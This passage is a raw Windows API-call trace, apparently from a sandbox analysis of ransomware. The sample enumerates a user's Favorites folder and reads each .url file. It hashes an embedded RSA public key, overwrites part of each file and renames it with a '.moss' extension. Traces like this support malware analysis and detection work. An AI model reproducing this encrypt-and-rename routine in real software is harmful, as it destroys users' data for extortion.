Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0171.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0171.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c628 [0171.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.414] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.414] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.414] PathFindFileNameW (pszPath="") returned="" [0171.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.416] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0171.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.416] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.416] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.420] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.420] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.421] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.422] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.422] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.423] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.423] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.423] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.423] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.423] GetLastError () returned 0x0 [0171.423] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.423] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.423] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.423] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.423] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.423] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.424] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.424] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.424] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.moss")) returned 1 [0171.427] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0171.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.428] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.428] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.432] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.433] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.434] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.434] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.436] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.436] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.436] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.436] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.436] GetLastError () returned 0x0 [0171.436] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.436] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.436] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.436] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.436] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.436] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.437] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.437] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.437] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.moss")) returned 1 [0171.438] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0171.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.439] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.439] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.442] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.442] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.443] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.443] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.443] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.444] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.444] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.444] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.444] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.444] GetLastError () returned 0x0 [0171.444] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.444] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.444] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.444] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.444] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.444] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.445] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.445] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.445] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.moss")) returned 1 [0171.446] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0171.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.448] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.451] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.451] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, 